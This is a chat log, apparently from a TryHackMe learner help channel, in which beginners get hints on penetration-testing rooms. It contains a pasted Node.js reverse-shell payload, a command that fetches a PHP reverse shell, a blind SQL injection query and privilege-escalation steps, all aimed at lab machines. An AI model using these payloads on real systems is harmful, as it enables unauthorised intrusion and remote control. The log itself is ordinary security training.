thx, i did it

For Net Sec Challenge, task 2, evading the "IDS" the room does not seem to be working. I've reset the box and room three times now and the IDS is apparently receiving traffic even though I'm not scanning it.

I've worked through all the types of scans, like X, M, W ... and the like. I've implemented decoys, spoofs, and fragmentation, as well as the -T levels.

You are over thinking it. Don't worry about it going up, just reset it when it does. The flag will pop when you get the right scan.

And have gone between the "Attack Box" and through my box over the VPN

Do I need to mess with any -T options?

Or is this just as simple as -s?

No, its just the nmap <scan type> <IP>

Ok so a very vanilla SYN scan gets me hit at 97%

Where as the lowest I could possibly get it with decoys, spoofs, fragmentation, etc was 7%

https://tryhackme.com/room/nmap03

See if this helps you any.

Lol thats one of the rooms almost right before the challenge

I know, I've pointed you to it for a reason.

Still getting detected. I've got it set to only port 8080. Should it be all ports or just the default range?

Ah got it. Wow

hey whats up guys? I just started my first ctf ( i am loving it), this can be a place where I reach out (assuming I have done my own research first) to help get unstuck?

yeah this is for hints for tryhackme rooms and tryhackme ctfs

only hints and not spoilers

spoilers are in #room-help

sweeeeetttt

hey guys, here is where I am at currently

im not sure if I need to put an ip address in here... I have a low level shell on the target machine

That's not a THM IP that you are trying to use with wget

so that is on the low level shell I have on the target ip

target machine that is, forget the ip

I wouldnt think I would put the target ip address in there as well?

Well you are trying to wget the file, so therefore your own machine has to be connected to the THM VPN and then you use that IP to get the file.

So is your machine connected via openvpn already?

correct

Then you also have to use that IP. Enter ifconfig on your machines terminal and use the IP on the tun0 interface

ohhhh

i didnt use tun0

does tun mean I have a tunnel with the vpn?

yes

tun0 is the vpn network card so yes

awesome... yeah my noob self did my own ip 😫

any common reason why a secure shell is freezing? sure could be 100 reasons but wondering why it keeps happening righ tnow

restarting virtualbox, lets see if that changes

here is my tun0 from vpn

this is on my kali

taking a very long time to connect. i feel like something is wrong

and he is my openvpn connection confirmation ( i believe)

restarting target machine and trying again.

same thing

any ideas? thanks in advance

got it!!! I secured my shell through ssh, so I need to use ssh, dummy!

https://tryhackme.com/room/frankandherby

anyone can help me out?

i found two webpages one with orcket chat and another with apparently no flaws

and the site says that i must exploit kurbenets misconfiguration

but i dont know how

it says that frank leave exposed something that starts with "." and has 16 charcters

i really dont have any idea what is could be

have you tried looking through the #905228711698247700 channel?

yes 😦

Hello guys can someone help me on task5 Linux PrivEsc Jr pen path I found the kernel exploit
I download it on my kali machine created an http server with python did wget to transfer it to the target machine and they send me this
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
37292.c: Permission denied

Then you don't have write permission in the folder you are in. Search a folder where you have write permission and try to wget again

Ok thanks

Hey everyone... Not asking for the flag...But, Under Authentication Bypass...Logic Flaw room...where Robert is trying to reset his password... I'm having a brain fart....How do I get to Robert's email????

think they just give you it dont they?

I think I'm supposed to click a link in the email that takes me to where I can look at tickets... then I can get the flag

i'll look again

@karmic ice you discover the 3 usernames in task 2 - Simon, Steve, Robert

It's after that part...it's when you have to use three CURL commands

to reset Robeert's password

I'm going to go look again Tha k you

yeh so following on from your initial question - they give you robert email...

How do I read his emails though

maybe I asked it wrong...sorry

you control where the reset email gets sent, so it wont get sent to his email account

Oh....ok I'll try thst...THANK YOU

I totally missed the first step... Thank you for your help! I appreciate it

That's all it took...your help is greatly appreciated

@vagrant dove Giant THANK YOU for your input and help...

Gave +1 Rep to @vagrant dove

Thank you Robocop...I wanted to find some way to give them credit

hahah no worries my friend

ok im at the end of my rope

im doing DNS in detail and im stuck on question 1 for the practical

What is the CNAME of shop.website.thm?

oh i was gonna post a screen shot but it wont let me

anyway it keeps coming up "server can't find shop.website.thm.website.thm" so i really need to know, am i doing something wrong?

shop.website.thm. you duplicated the domain/tld

ya i tried that already

if you look, it already adds <domain>.<tld>. so only enter the subdomain

any luck?

nope. i really feel like im doing something wrong

update the record type, CNAME, then fill in "shop". click send request. very last line

lowkey wanna cry because i been on this same question for three hours and that works

i think i recall having an issue with it as well. like the record type changed and reset the value field.... i'm pretty sure i got mad at it as well

now im just stuck on the IP address for the A record

hint: "a record" and dont forget the subdomain

oh so thats just a randomly capitalized a?

an A record is a type of entry. A = ipv4 Address record. AAAA = is ipv6 Addresss record

it's explained in task 3

ok so the issue i was having with the fourth question was the same you pointed out to me in the first.

many thanks for the help

hi, i am struggling with the ctf "vulnnet:internal" there's an rsync deamon and i think i can sync dir from remote server to my local machine. but i don't understand what's the syntaxe for it.
someone knows how to rsync from a remote server ?

hello guys I need a hint on task 7 Privilege Escalation: SUID I didn't understand the last part from We will "then add this password with a username to the /etc/passwd file." /etc/passwd is supposed to be rx only

which room?

Linux priv in jr pen path

h. okay. so you need to follow the task. look for a tool that has SUID/SGID set, and lookt itup in gtfobins. it will help you get access to write to /etc/passwd

Ok thank you I'll try that

Gave +1 Rep to @glass eagle

there are a lot of results, and as a beginner you dont know whats expected or unsusal, but put the command names in gtfobins and you'll find a result

on the basicpentesting challenge

almost done and heres the hint asking about another username I know....

apart from a password, how else can a user access a machine?

I am unsure what that hint means besides, besides a password, what other ways can you get in....

unless they mean password hashes and the like

https://www.ssh.com/academy/ssh/public-key-authentication

i have the login through ssh

and cracked my first password

let me look though and thanks!!

yeah I have cracked the first password and I have also enumerated for possible esc privileges

for the other user that I have not cracked, I am unsure if I am supposed to do something different besides try to crack that one as well... maybe I am looking too much into but there is another step I think Im missing. I will keep looking at the ssh if thats it!

🔑

any luck?

ah so the key is important here...

I will look where public keys are stored... I am heading to meet a friend but I will try when I get back

this is challenging and also exciting... thank you twypsy

hello, any hint on the Minotaur's Labyrinth room? i can't get the rev shell to work using netcat, i've got the user flag but cant get a rev shell

maybe ask in #906261933471187014

thanks

Linux Fundamentals Part 2 - Task 2, Accessing your linux machine using SSH (Deploy). I have the Attack box created, I connected through SSH to the private IP address, but it's not taking the password "tryhackme". Any thoughts?

thats the password?

It gives you the uname and pass and just tells you to login...

cli fires back tryhackme@10.10.15.68: Permission denied (publickey,password).

You gmight haveto send a screenhot of hat, Therfore you would have to verify your THM profile in discord first in order to be send screenhots.

!docs veriy

yeah i just did that not too long ago

OK - I believe I was verified... how can I tell?

You haven't verified yet

There's should be color in your name

Other than white

You can tell by having the "verified" on your THM discord profile in the THM server which to in discord but you haven't read so far have in discord. Sry, the first link had a typo, so just use the latest ones.

!docs verify

hope you get it verified mosquitoes, I just started as well, I love it

Well, I'm light blue.

here's the info for the AttackBox

And the instructions tell you that the password is "tryhackme".

Alright - no worries, it wasn't worth any points or anything. You just click next, but I felt like I was missing something. I've been going at this for a while, I'm taking a break.

You are trying to ssh into your own machine (attackbox) instead of into the target machine.

hi guys 🙂 i am doing the Network Services room, on the "Enumerating Telnet" task i am stuck when it asks me the "title" of the port i scanned, i don't have a clue about what it's asking me to do

i'm currently working on the active recon room, and am stuck task 5, the first question telling me to telnet the machine ip and port 80, then asks for the name of the running server but im having trouble doing such. i've typed telnet MACHINE_IP (the actual one) 80 but i get Connection closed by foreign host. whenever it finally gets done connecting. what am i doing wrong?

k well i watched a yt video and ran exactly what the guy in it did and it still didnt work so i just got the answers, but it seemed that netcat also didn't work so i did the same

Have you connected to the telnet port?

Yes i managed in the end, very confusing room though

Thank you! Got in this morning. Didn't realize I needed to run both of the machines 🙂

Gave +1 Rep to @left thunder

so confused on task 11 on https://tryhackme.com/room/zthweb2

i'm not entirely sure what the question is asking. based on the previous task, and the hint, i would assume i'm to fuzz the parameter.
i've tried all of the following but found nothing

http://10.10.88.53:82/FUZZ
http://10.10.88.53:82/FUZZ.php
http://10.10.88.53:82/api.php?FUZZ=id

basic pentesting and the last key dealing with keys

im probably off the wrong path... I am trying to get the rsa key on the target machine for the first user I found, (not sure if thats the right way to do it as I think I want the key for the other user) I am also denied from viewing this stuff, so im not sure if thats why its saying theres not file because I cant access it.

i have set up a simplehttpserver on the target machine

Eyyy, can i ask about the JR Penetration tester > Introduction to web hacking > sql injection > Task 8 Blind SQLi - Time Based

sure they could help but theres a jr pentester chat?

oh i didnt see lmao, thanks

Any hint for room "frank and herby make an app"

2nd flag

There's a channel for that #905228711698247700 😉

any nudges for flag3 on python playground?

I found an internal web server running... How to get around it?

should I try dirbusting? (coz the whole box was about challenges and not anything bruteforcing 😅 so haven't tried that yet)

Windows Fundamentals 1 - Intro to Windows... it's talking about using RDP, but I don't see anything in the AttackBox that indicates that it is the RDP... later on in Task 6, I think I'm supposed to be RDP'd into the target machine in order to extract usernames, what groups they're members of... I just refreshed the page and it switched from the AttackBox that I've been seeing and now it's a Windows PC "THM AttackBox:WINFUN1.1". Same name as before, but... not sure what's going on here. Still no RDP, just Remote Desktop Connection

very frustrated walking away for a few

nm - it didn't actually want me to RDP... just using the Winfun 1.1 box and go through lusrmgr... hmmm

Hi guys I'm doing Linux privilege escalation on kernel. I try to use SimpleHTTPServer and wget but I can't transfer the exploit code on the target machine to exploit it. I'm noticed that "permission denied". Please can somebody help me ?

You have to search for a directory where you have write permission to.

Done🙂 Thank you very much

Gave +1 Rep to @left thunder

Writeups are not working

Can someone provide a nudge for the minotaur room please

Flag number 2

Just wanna know if i’m in the right way

There is a dedicated channel for that room if you are talking about the newly released one. #906261933471187014

Thank you

Gave +1 Rep to @left thunder

hello

hope u doing well

can anyone suggest any book/course about assembly language

thanks

Search for assembly on tryhack me. There are a few good rooms

am i the only person having problems getting access to the robots file on the pentesting course "Manual Discovery - Robots.txt"

i started the machine ad the waited for the ip to show up and when i click on the link "this page cant be reach" pops up

Are you trying to access it from the attackbox or your own machine?

For books you might want to check/ask in the #bookclub channel

its the start machine butto at the beginning of the task

Yes, that button is for the target machine. But from what machine are you trying to access the robots.txt that's on the target machine?

task one was telling me to start the machine before moving to task 2, which is where im asked to go to acme page to view robots.txt

but for some odd reason it wont load

Can you try if you can access 10.10.10.10 in the browser of the machine you are trying to access the robots.txt with?

So just enter that IP in your url bar

im trying it now but nothing is popping up

Then you are most probably not connected to the THM VPN and therefore can't access target machines. You have to set up openvpn first in order to be able to access any THM machine if you are doing it from your own machine. Or use the attackbox. This room will guide you on how to set that up: https://tryhackme.com/room/openvpn

Hei, everyone! Does anyone have any idea what I'm doing wrong that John doesn't seem to work? I've tried different syntaxes, tried apt purge, apt reinstall, john seems to be on the latest version, 1.9.0 and I honestly have no idea what is wrong here.

It seems it has already cracked it, what if you do john --show forjohn.txt ?

oh damn, I actually did not think about that, to be honest didn't know about that option lol

I feel stupid, but damn, learned something new out of it. Thank you so much!

ok so i downloaded the openvpn ad connected the when i wet back clicked on the link ow the site is saying - User-agent: *
Allow: /
Disallow: /staff-portal

Alright, so now you successfully saw the robots.txt file

wait huh thats what i was suppose to see?

Yes

lol oh, im still over here mad stopping and and restarting the machine

Well ^^ ..

thank you, you helped a lot

Gave +1 Rep to @left thunder

@left thunder how does the bot work? Should I have replied with "thank you" to you? Cause you definitely helped me too, a lot, and I would like for you to get another rep

The bot will give rep if you either reply to an answer or tag him with something like "thanks, or thank you or +rep" , but it's fine, it's more of a fun gadget 🙂

Gave +1 Rep to @shy pagoda

thank you! 🙂

Gave +1 Rep to @left thunder

x2 even. Hah, might abuse it.

😄 appreciate it

Well there is a cooldown of a couple of minutes 🙂

ah, darn it.

got it 😄

ok i'm back again side note: my letter 'n' doesn't work right now and i have to copy and paste it when i need it. that is a problem for some of the work in the VM, because i cant copy the "n" where i need it. so i having a problem with task 3 pentesting.." Manual Discovery - Favicon " where do i run the code? so i can get the answer. thank you

do i use the terminal in the attackbox? because i can't use the letter 'n' on my keyboard. i have to copy and paste.

i think i have to subscribe, don't i ?

You have to subscribe for what?

my letter 'n' doesn't work right now and i have to copy and paste it when i need it. that is a problem for some of the work in the VM, because i cant copy the "n" where i need it. so i'm having a problem with task 3 pentesting.." Manual Discovery - Favicon " where do i run the code? so i can get the answer. thank you

Gave +1 Rep to @left thunder

Well you are just copy pasting what you already wrote, I'm not quite sure what the letter "n" and you not being a subscriber has to do :D? As you said "i think i have to subscribe"

ok the question i really need to know is, do i have to subscribe to an paid membership to get the answer needed for most of the task. i'm having a problem with task 3 pentesting.." Manual Discovery - Favicon " where do i run the code? to find the answer.

No

You don't need ti be subscribed to answer any question

If the room isn't a subscriber only room, then you don't need to be subscribed

Okay, I guess you are talking about the curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum part, right?

yes

because i spilt milk o my laptop i cant use the letter 'n' to type. i the vm machine world.

i'm waiting on a new keyboard

You can copy paste the command. You run it on your attacking machine

in the terminal?

Yes

Curl is a CLI tool

So it depends on where you are trying to do it. The attackbox has no internet connection for non subscribers, so I highly assume you can not access the site https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico on it. I personally haven't tried it for that url, but I guess you can't reach it. So you might have to set up your own VM in order to do that task.

i tried copying and pasting, didnt work

Are you using the attack box or your own vm?

attackbox

ok so i have to sign up.

No

To copy paste to the attack box you have to use the copy paste tool. I'm not entirely sure how to explain it tho 😅

😆

Actually, you might not be able to reach that link from in the attack box

Since attack box has no internet

I mean all you have to basically do is getting the md5sum of the favicon, maybe there are some online tools where you can just upload the favicon to, to get the md5sum. Or you can do it on your own machine, not sure what operating system you are running or what tools you need for your operating system to get that md5 for the favicon. But ye, either you subscribe to get internet access on your attackbox, or you just install your own kali linux (for example) on a virtual machine on your computer, so you can do all the free rooms in kind of the same way as you would be on the browser based attackbox.

I would go with installing kali in a vm

https://youtu.be/V_Payl5FlgQ

Follow that guide to set it up

thank you, im about to do so now.

Gave +1 Rep to @left thunder

thank you, im about to do so now.

Hey guy's. Linux fundamentals part2. can't understand why I can read file from another user

hey guys im doing the brute force section in bypass authenthication,in the jr pentester path.Im trying to use this ffuf command but it doesnt give me any output despite i did everything as I was told

Check the permissions, read permission for "others" is set.

Check your valid_usernames file, there should be only 1 username per line without any status codes or whatsoever

thanks,i will try that

it worked

how can i give you +rep?

Thanks!

Gave +1 Rep to @left thunder

Thanks!

Gave +1 Rep to @left thunder

hope this can be helped here, please let me know if theres a better room for this... I am looking at burpsuite room and I am unsure of this instruction

when it says navigate to the web application hosted on the VM (ip address listed at top of screenshot, I am not really sure what I am trying to connect to. I typed in the ip address of the vm, but thats just loading... not sure

heres my burp pulled up as well

the browser is loading because its waiting on a response. burpsuite is acting as a proxy to make the requests. burpsuite would need to allow/deny the request before the browser gets their response

for this, click on the "action" next to "intercept is on" and look at the options

wrong one

you'll get other requests from the computer. firefox updates, checkins... it happens

are we sure that the stuff showing in burpsuite the googleapi is from the ip address that I put in?

its from your browser. any tab/plugin/etc that browser has open/enabled.

Return to your web browser and navigate to the web application hosted on the VM we deployed just a bit ago. Note that the page appears to be continuously loading. Change back to Burp Suite, we now have a request that's waiting in our intercept tab. Take a look at the actions, which shortcut allows us to forward the request to Repeater?

but whats the web application? sorry im not getting this

a website is a web-application.

so when it says on the vm?

that means put the ip address of the target machine into the url window?

1. yes. take your attack machine (running burp with the burpproxy enabled) and load the website hosted on the target VM

2. the requests will show up onproxy > intercept

the answer is visible here

trying again now

thank you... will let you know if any issues come

i legit didnt realize when they say shortcut

they mean ctr+s whatever

👀

prob should take a break for the day

https://dontasktoask.com

Question: In vulnversity, is there any practical use to the user flag in /home/bill or is it just "there"?

https://tryhackme.com/room/vulnversity

Well it's used as the answer for a question in the task, so yes there is a use for it ^^?

That aside, I mean

ah

ok thanks

Think of the flags as placeholders for files or pictures or passwords. They represent sensitive information that you weren't intended to have access to

can anyone give any hints on where to start in the picklerick ctf? ive only found the username and used gobuster

You can use gobuster to search for file extensions, as well as directories

Hello folks, I need a help...I am stuck in one of the https://tryhackme.com/room/xss TASK-3, Qstn-3
Where I have to Create an alert popup box appear on the page with document cookies.
I have done that part after logging into attack box and even got an alert pop-up with the answer... But that answer is not getting accepted... Not sure.. if I am missing anything there..

Need a nudge for bounter hacker Priv esc if someone dosent mind

Try restarting the machine and then trying the injection again

Could you give a link to the room please?

https://tryhackme.com/room/cowboyhacker

Ah I've done that one before and did a write-up I think. Give me a sec because I haven't gotten up yet XD

Yeah user wasnt bad to get but ive been stuck for a bit now.

What have you tried so far?

I've looked through SUID's, and was thinking if i could set up something with netcat but not sure where to start or if that would escalate it at all

Did you find any SUIDs?

so, user isnt in sudoers and the only ones I saw on gtfobins needed it

The first thing I tend to do for priv esc is check which commands I can execute as sudo

sudo -l

I didnt know that

thanks. It was giving me a different error earlier

I do this first since it's the quickest thing. Then I check SUIDs and then crontab etc and so on lol

You're welcome :)

Got it. I was stuck for like 3 hours and you saved me

you're very welcome ^^

can i get a hint on the json return data on year-of-the-fox roon ?

room *

Hey, everyone! Hope you are all having a good day/evening/night! I am currently working on "Agent Sudo", and I'm trying to get my hands on a file through ssh, using scp, but I am not sure what I am doing wrong? Could you please point me in the right direction maybe? Thanks in advance!

Thanks... It was the difference of 0 and O

Gave +1 Rep to @dry gate

what the hell, this is just another time that I am so amazed seeing how I'm not paying attention to small details and thus causing trouble lol

Thank you!

Gave +1 Rep to @burnt rivet

I'm now at the part of privilege escalation on Agent Sudo, I have tried to run linpeas, but I am not sure what I should be looking for...any hints (just hints, please)?

think about the name of the room

thank you! Was thinking about it before, but you reinforced the thought that this might be it for me!

Gave +1 Rep to @polar finch

anybody help with a burpsuite

its on the burpsuite intruder room

I ran the pitchfork and it came back with 100 guesses, the only problem is all of mine are the exact same length, whereas the answer says you will have one that is different

heres payload set 1 which is the username.txt

payload 2 with passwords

positions

results

I think you haven't intercept the request when pressing the submit button after entering a username and a password, rather you have intercept just the simple request of the login page itself

so i never actually entered the username and password... i only changed it in the intercepter

Right, so go to the login page, enter any bogus username and password and only then turn on intercept, then press submit so that you intercept the actual login request.

ohhhhhhh

so forward the request first so I can go to the login page?

Yes

or I could just turn everything off and then turn it on

You can do that too

one sec

Hi guys, I cannot submit answer on room/fileinc task 5 - first question. I have a string which worked and matches the ***... hint but there is no right/wrong popup when I hit submit

so once I clicked submit (i entered user and pass) I can forward this to intruder, and then do the same steps I did previously

trying now

Right, as that is the actual login request, the previous request you edited was just the request to go to the login page itself

correct

thank youuuuuuuu

Try ctrl + F5 to hard refresh the page

let me in

so basically, just make sure the request is the correct request/etc

otherwise, you wont have the correct info

Well I mean you could have crafted the request yourself, but I think that's out of scope and anyways it's way easier to just intercept the correct request, so yes 🙂

help with vulnversity (im actually using burp suite now) and I am under compromise the webserver

please 🙂

ill post what I have

the document I am trying to upload

screen of me choosing the document I just showed to submit

all the same output

I have obviosuly made a mistake as the output is all the same, which is not good for me... I tried following the steps listed, but I might have made a mistake in the doucment itself i submitted through the form or my payload option isnt right by me putting in the .php, etc... would be very much appreciated

I think the issue is that you didn't gave your shell file an extension itself(you called it just "shell" instead of shell.php for example), therefore the content-type was specified as octet-stream as you picked that "shell" file to capture the initial request and now causes that issue.

yeah i did that (incorrectly) as I modified actually shell.php TO the shell haha.

let me see

do i need to dress up the php doc itself as well?

Not sure what you mean with dress up ?

like is this code fine? I meant like do i need to do <php>

</php> in the doc itself

i might be talking nonsense (I most def am)

Well that file would be used as a wordlist, regarding to what you put in there. So not sure how you specified the wordlist in the previous image. But the important thing is that you have to upload a file with .php extension for the initial request.

ok let me try again... ill have a question about my payload in jsut one sec. thats what got me here in the first place

Either your write the file extensions you want to use for your sniper attack manually in the payload field, or specify a wordlist file is up to you

I think i might have done both... let me run this real quick.

here is what i just set up. I am about to run the attack

Ye content type looks fine now

Looks also fine 😄

but im not seeing anything different from the rest?

Oh you have an issue with the payload position from that image. Clear the payload positions and add it again at the correct position. If you look closely it says "3 Payload positions". But it should be just 1 Payload position to snipe the file extension.

this?

thats the one you linked to, i believe

Look at the left bottom corner, it says 3 Payload positions, can you see that? Not visible in that image as you cut it off, but I saw it in the previous image

ahhhh

one sec

i have no idea how that happened... maybe previous stuff I was messing around with

Ye, just clear them with the buttons on the right and set it again on the right position and you should be good

uh oh haha... what did i do this time

heres me showing theres only 1 positio now

Ye, that's fine now. At least I hope so 😄

heres what I have for the payload options (i simply loaded the shell.php in there)

Man, that task shouldn't have been that difficult 😄 Can you send a screenshot while you have the .php5 marked in your results so I can see the raw request field?

this>?

Yes

Mh, I wonder if the issue is that the . got url encoded, let me try myself, 1 moment

https://tenor.com/view/the-office-bow-michael-scott-steve-carell-office-gif-12985913

Okay, seems it is because of the url encoding. At the payloads tab, at the bottom of that page, there is a checkbox for url encoding special characters, uncheck that

so that was a default setting, is this something that normally isnt a big deal, but is here?

Not sure, I would say usually you will use intruder on the request body instead of the headers, so maybe that's why.

phtml baby

Finally 😄 That one gave me a hard time right now for such an easy task ^^

goodness but i got through it

so im not sure if i understood your last message... is there a lesson here i should learn about the url encode? not sure i fully grasp that yet

Stole that pic from @burnt rivet ^^ But that's just a great pic to show what the headers are and what the request body for example.

But regarding url encoding I would just look it up on google

yup just screenshot that

is there a better tool to do an intruder attack than burp? I have heard a decent number of people who dont use it

but just a beginner

Well intruder is just the name of that burp module, so it depends on what you want to do, if you try to bruteforce something with kind of large wordlists then burp might not the right choice. But for stuff like where you kind of manually try to modify requests, so regarding to that example, figure out what extensions are allowed I think intruder is great.

me again 👀

this has got to be something small

where im at

ncat listening

this is the php-reverse-shell.phtml

that is my ip and it is connected to tryhackme

also port 4444 and i also have ncat at 4444

php-reverse-shell.phtml going into upload

upload success

what i put in the url bar

fails

and its not showing on my netcat

only other thing i found was I went to the uploads and clicked on it, but it still isnt working. THanks in advance

i did restart and did the same steps

script

showing i am getting the 5th version of this ive created

I tried clicking on the 5th

and this again

and nothing on nc

Can you send the link to the room?

https://tryhackme.com/room/vulnversity

and I am under task 4 towards the end

Gimme a sec the run through the room. Should only take a few minutes

im quite stuck what to do rn

this is the "overpass" 1 room

joker, I have been working on this for hours, I am going to head off but look first thing in the morning... if youre able to get it working, any screenshots would help me... not sure whats going on with mine.

and thank you for taking the time... been banging my head and im sure its something small

I was just about to ask if you're sure you're using the right ip address

whats up?

so I am using this one

If you're still on, if you could do an ifconfig tun0 and send a screenshot

Best I can say is try terminating then restating the box for now. Not exactly sure what causes the failed to demonize error but I'm looking into it

yeah i had two tun0 and tun1 previously

i quit all

restarted my vm

and then confirmed i only had one tun0 as you just saw

im restarting the box, and ill give it one more try before bed ha

Try redownloading the reverse shell

good tip

To make sure you arent cutting part of it out accidently, do curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o test.phtml to download it

then make sure you only change the IP address and port

alright just changed the ip to my target machine and kept the port as is

my nc is also 1234

see the weird thing is I will try the /uploads page and half the time, it wont really connect, the other half it will

its kind of a dance im doing with it

ok i just uploaded the test.phtml

now im going to uploads to click on the link

moment of truth

anddddd its just loading....

here was the test document

Huh. Weird. I got nothing

It worked fine for me

you got the same thing?

damnn

I've heard that it could be a firewall issue, but idk.

If you want to, you can try turning off your firewall on your host machine and see if it works

when you say host machine, do you mean not my vm?

I am in a virtual box right now

You could also just try using port 443 cuz that usually slips past firewalls

Y3s

Yes

says my firewall is off

this is on my mac, not my virtualbox kali

On your host machine?

Huh

Do you have an anti virus on?

yes

on the host, not the vm

Tru turning it off and see if that works

Try*

could i just try to go to uploads and click on the same link?

Yea

Did it work?

not yet but im trying to make sure its off

turned it off and still the same effect

is there anything on my kali that could be holding it up?

Damn. Idk

I've never seen that issue before

im sure its user error somewhere ha

but i seem to be doing it right

Probably. But idk

yeah this has been frustrating... im going to call it a night.. hope i can message tomorrow! thanks for sticking in there with me man

I completely closed it, terminated the machines and ran it again on different browser. No change

any hints on how to get foothold on squidgames machine?

What you mean with ran it again? I thought the issue was with entering the answer?

There is a dedicated channel for that room, maybe you ask there. #908436580438540388

hey everyone , im stuck at year of the fox , i have managed to get the creds for the web now im stuck on how can i make the search bar usefull as it returns a list i have no idea what to do from there

i can only change parameter from {:} dict when i used burpe

can i get a hint please

does anyone know why concat would return one entry, while group concat is returning multiple (screenshots coming)

can i get a hint on year of the fox ?

on the search part

Why does this union work when referencing a different table 'users' than where the current selection statement is pulling from? Every other command prior to this we had to specify the specific databasename and table name in order for this to work

Not sure if you should post flags in here. But regarding to your question, for the previous statements you had to specify the database name as you where querying from the information_schema database and in order to retrieve the tables and columns for that task you had to specify from which database you want to get the table and column names from. If that's what your question is about.

ah my appologies, will delete and repost

so your assumption is that the users table exists within the same database that this unmodified select statement is pulling from, right?

Ye, you are basically already inside the database for that task, so you don't have to specify it, you only have to specify from which tables you want to query from.

one more question if you dont mind

Figuring out the database name itself was only to find out the correct table and column names

with the original select statement, lets assume its this

select * from blogposts

when we enumerate the columns we do something like union select null,null etc

lets assume blogposts has 3 columns

when we start to then pull data from another table, users, does the users table need to have the same amount of columns for this to work?

I think yes, so if one table has 4 columns and the other one has 3 but you query 4 columns, I think that's not working. But not a 100% sure so you might look that up. But task 3 has a brief description of the UNION statement, so you might reread that.

it worked when i went to the attack box... scratching my head why it didnt work on kali

Hi there, are the KotH points also contributing to the monthly scores?

Network Services - Exploiting SMB. I've logged in with the anonymous account and null password. I can ls the contents, but I can't figure out how to tell who the profile folder belongs to...

Here's a list of commands that I have access to

Then you might want to check the files you found.

Yes, I'm trying.

However, cat.. nano, don't work

I tried allinfo "Working From Home Information.txt" but that doesn't give much

OH, wasn't doing quotes on "More"

Got it I think

So... is "scopy" the same thing as "scp"? I'm not seeing anything on the web about scopy, but I can find "scp" referenced.

I'm trying to get the syntax correct for scopy to get a local copy of the id_rsa file so I can chmod 600 on it

If your in an smb share try get

yeah, get will move a file onto your machine. mget will move multiple files. From there you can cat them.

I am trying to do the /bin/bash by adding the +s to bash

am im trying to figure out if I actually know the password for this user www data

I guess im asking if I am on the right path or not

but I dont think its even allowing me to do that

this is on vulnversity, last step before i take a small break from breaking boxes and just learn for a bit

but the hint is /bin/sysemctl

and i executed it but im not sure about that unless theres something in systemctl that can change something

Check https://gtfobins.github.io/

will do

Can anyone give me a hint on the new SQL injection room on the junior pentesters path? I'm on task 8. I've figured out the database name and i'm working on the table name. It's already 19 characters long. Have I somehow gone down the wrong path?

Ye, 19 characters seems too long

That's what I'm thinking, but it's two distinct words separated by an underscore. So it's definitely something there in the database.

The room is new enough that's there;s no write ups, which I may make one over the holiday break. I've been looking for a need like that. Gotta figure out the room first though.

You can post the query you are trying right now and I can let you know in case there is something wrong with it

Fair enough. Just don't want to leak any answers

You can mark it as spoiler with the 2 vertical bars

|| ==admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA
='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME like 'a%';

Hmm... didn't work 😆

At the beginning and at the end you have to put them

Learn something new everyday.

I believe there's more to the table name because the column name isn't making any delays on any characters.

Ok well, ye that table is there too, so I would just go over the tables again to look for another one

Yea. Somebody should probably be aware of that. If I started with 'a' and enumerated from there others probably will too. I don't know how to alert about that.

anybody here to help with my last step in vulnversity

i am just having an issue opening a http.server as I want to share a file

when i try python -m http.server 80, it lets me know that its already in use... but i never started anything on my end in port 80... any thoughts on how to get around this

I made my service script on my machine and I am trying to get that over to the target machine

try a higher port

like 8081

1234

ok that worked

now I can use wget on the target machine, at least thats what Im going to try

ha

opened the port

but then i tried wget with my vm ip and then the name of the file,which I will show on my host machine

showing root.service on my vm machine

what am I missing?

I dont think it matters, but I will show what the root.service is

again on vulnversity. trying to privescl

add the port after the ip

on the wget request?

wget 10.10.161.19:8081/root.service

gotcha. let me try

target machine

says success but says permission denied

heres my machine

that doesnt have anything to do with the permissions i gave to root.service... I don tthink thats relevant here

?

i dont think u got permissions to edit the root.service 🤔

koth box?

i just did this.

lets see if that changes anything

I dont think i gave it the proper w command as it says it cant write to the service

wont be allowed in the macine ig

?

You have to be in a folder where you have write access in when you wget that file.

hello guys

any hint on containme room?

seems that i should start a ssh bruteforce

#908828816393244742

Hello, wondering if anyone can help me with the attacktive Directory lab, im right at the end using evil-winrm v3.3 but running the command keeps timeing out I have the hash and have tried using username a** and spoka both have timeouts, i tried using the xfreerdp method but it connects and says the account is restricted using no password
i treed to add the a*account to the remote users group but both user accounts i have access to cant access users and groups

never mind I used the attack box to complete this and its using v2.4 the same command worked

#908828816393244742 😉
And don't bother.. No need for bruteforcing anything 😉

i dont understand

i am solving the upload vulns room

i have done everything correctly, even i watched videos on youtube

still the reverse shell isn't working

����(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4545, "10.9.3.48", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();

i have also set the magic numbers properly

you're going to have to be more specific. Which task?

https://tryhackme.com/room/uploadvulns

task 11

I can't help atm but it's so that if someone does see this, they'll be able to help out :P

The error says that: The image "PATHTOIMAGE" cannot be displayed because it contains error

so the folder itself i would do chmod or the file?

You have to search a folder where you are able to write to, so where you can create files, otherwise wget can't write the file you are trying to download into that directory

andthats on the target machine, not my machine, correct? thanks for all your help fontaene

Gave +1 Rep to @left thunder

I mean you want to transfer something to the target machine and therefore use wget on the target machine, right? So yes

Thank you for your help yesterday (and same with @left thunder )

Gave +1 Rep to @waxen mica

Ok - probably another silly question. Network Services - Task 4 - Exploiting SMB. I'm at the very end of the section and it says to change the permissions to the downloaded "id_rsa" with chmod. I confirmed the changes through ls -l, it's accessible and it's the key that's needed. I've found the account name was "cactus". However, in both smbclient and ssh I'm not seeing any options to use a key instead of entering the password.

Maybe -A authfile?

ssh -i keyfile user@IP

room: https://tryhackme.com/room/ide
i thought i was going crazy because i've been trying this for about 30 minutes and thought i was using the wrong file, but i checked writeups and it is the right one
why is this not running my command?

THANK YOU!!! I feel like I've been beating my head against this thing. Thanks again!

Gave +1 Rep to @left thunder

does anybody ever have any issues when downloading a new os on virtual box, when i load, the screen keeps fklickering

im trying to look into resolution, etc

this is more of a question for #infosec-general :)

cool

